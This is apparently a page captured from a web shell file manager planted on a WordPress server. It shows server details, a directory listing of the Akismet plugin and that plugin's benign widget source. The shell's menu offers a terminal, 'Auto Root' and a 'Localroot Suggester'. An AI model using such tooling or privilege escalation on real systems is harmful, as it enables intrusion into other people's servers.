Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
wp-content /
plugins /
akismet /
Delete
Unzip
Name
Size
Permission
Date
Action
_inc
[ DIR ]
drwxr-sr-x
2026-08-20 14:06
abilities
[ DIR ]
drwxr-sr-x
2026-08-20 14:06
views
[ DIR ]
drwxr-sr-x
2026-08-20 14:06
.htaccess
796
B
-rw-r--r--
2026-08-20 14:06
LICENSE.txt
17.67
KB
-rw-r--r--
2026-08-20 14:06
akismet.php
3.31
KB
-rw-r--r--
2026-08-20 14:06
changelog.txt
22.83
KB
-rw-r--r--
2026-08-20 14:06
class-akismet-abilities.php
2.05
KB
-rw-r--r--
2026-08-20 14:06
class-akismet-compatible-plugins.php
7.83
KB
-rw-r--r--
2026-08-20 14:06
class-akismet-connector.php
4.47
KB
-rw-r--r--
2026-08-20 14:06
class.akismet-admin.php
65.11
KB
-rw-r--r--
2026-08-20 14:06
class.akismet-cli.php
4.89
KB
-rw-r--r--
2026-08-20 14:06
class.akismet-rest-api.php
19.94
KB
-rw-r--r--
2026-08-20 14:06
class.akismet-widget.php
4.88
KB
-rw-r--r--
2026-08-20 14:06
class.akismet.php
87.83
KB
-rw-r--r--
2026-08-20 14:06
index.php
58
B
-rw-r--r--
2026-08-20 14:06
readme.txt
6.8
KB
-rw-r--r--
2026-08-20 14:06
wrapper.php
6.28
KB
-rw-r--r--
2026-08-20 14:06
Save
Rename
<?php /** * @package Akismet */ // We plan to gradually remove all of the disabled lint rules below. // phpcs:disable WordPress.Security.EscapeOutput.OutputNotEscaped /** * Akismet Widget Class */ class Akismet_Widget extends WP_Widget { function __construct() { parent::__construct( 'akismet_widget', __( 'Akismet Widget', 'akismet' ), array( 'description' => __( 'Display the number of spam comments Akismet has caught', 'akismet' ) ) ); } /** * Outputs the widget settings form * * @param array $instance The widget options */ public function form( $instance ) { if ( $instance && isset( $instance['title'] ) ) { $title = $instance['title']; } else { $title = __( 'Spam Blocked', 'akismet' ); } ?> <p> <label for="<?php echo $this->get_field_id( 'title' ); ?>"><?php esc_html_e( 'Title:', 'akismet' ); ?></label> <input class="widefat" id="<?php echo esc_attr( $this->get_field_id( 'title' ) ); ?>" name="<?php echo esc_attr( $this->get_field_name( 'title' ) ); ?>" type="text" value="<?php echo esc_attr( $title ); ?>" /> </p> <?php } /** * Updates the widget settings * * @param array $new_instance New widget instance * @param array $old_instance Old widget instance * @return array Updated widget instance */ public function update( $new_instance, $old_instance ) { $instance = array(); $instance['title'] = sanitize_text_field( $new_instance['title'] ); return $instance; } /** * Outputs the widget content * * @param array $args Widget arguments * @param array $instance Widget instance */ public function widget( $args, $instance ) { $count = get_option( 'akismet_spam_count' ); if ( ! isset( $instance['title'] ) ) { $instance['title'] = __( 'Spam Blocked', 'akismet' ); } echo $args['before_widget']; if ( ! empty( $instance['title'] ) ) { echo $args['before_title']; echo esc_html( $instance['title'] ); echo $args['after_title']; } ?> <style> .a-stats { --akismet-color-mid-green: #357b49; --akismet-color-white: #fff; --akismet-color-light-grey: #f6f7f7; max-width: 350px; width: auto; } .a-stats * { all: unset; box-sizing: border-box; } /* Re-hide screen reader text — the all: unset reset above would otherwise render it as visible text. */ .a-stats .screen-reader-text { border: 0; clip: rect(1px, 1px, 1px, 1px); clip-path: inset(50%); height: 1px; margin: -1px; overflow: hidden; padding: 0; position: absolute; width: 1px; word-wrap: normal; } .a-stats strong { font-weight: 600; } .a-stats a.a-stats__link, .a-stats a.a-stats__link:visited, .a-stats a.a-stats__link:active { background: var(--akismet-color-mid-green); border: none; box-shadow: none; border-radius: 8px; color: var(--akismet-color-white); cursor: pointer; display: block; font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', 'Roboto', 'Oxygen-Sans', 'Ubuntu', 'Cantarell', 'Helvetica Neue', sans-serif; font-weight: 500; padding: 12px; text-align: center; text-decoration: none; transition: all 0.2s ease; } /* Extra specificity to deal with TwentyTwentyOne focus style */ .widget .a-stats a.a-stats__link:focus { background: var(--akismet-color-mid-green); color: var(--akismet-color-white); text-decoration: none; } .a-stats a.a-stats__link:hover { filter: brightness(110%); box-shadow: 0 4px 12px rgba(0, 0, 0, 0.06), 0 0 2px rgba(0, 0, 0, 0.16); } .a-stats .count { color: var(--akismet-color-white); display: block; font-size: 1.5em; line-height: 1.4; padding: 0 13px; white-space: nowrap; } </style> <div class="a-stats"> <a href="https://akismet.com?utm_source=akismet_plugin&utm_campaign=plugin_static_link&utm_medium=in_plugin&utm_content=widget_stats" class="a-stats__link" target="_blank" rel="noopener" style="background-color: var(--akismet-color-mid-green); color: var(--akismet-color-white);"> <?php echo wp_kses( sprintf( /* translators: The placeholder is the number of pieces of spam blocked by Akismet. */ _n( '<strong class="count">%1$s spam</strong> blocked by <strong>Akismet</strong>', '<strong class="count">%1$s spam</strong> blocked by <strong>Akismet</strong>', $count, 'akismet' ), number_format_i18n( $count ) ), array( 'strong' => array( 'class' => true, ), ) ); ?> <?php echo Akismet::get_new_tab_screen_reader_html(); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- Returns markup escaped in the helper. ?> </a> </div> <?php echo $args['after_widget']; } } /** * Register the Akismet widget */ function akismet_register_widgets() { register_widget( 'Akismet_Widget' ); } add_action( 'widgets_init', 'akismet_register_widgets' );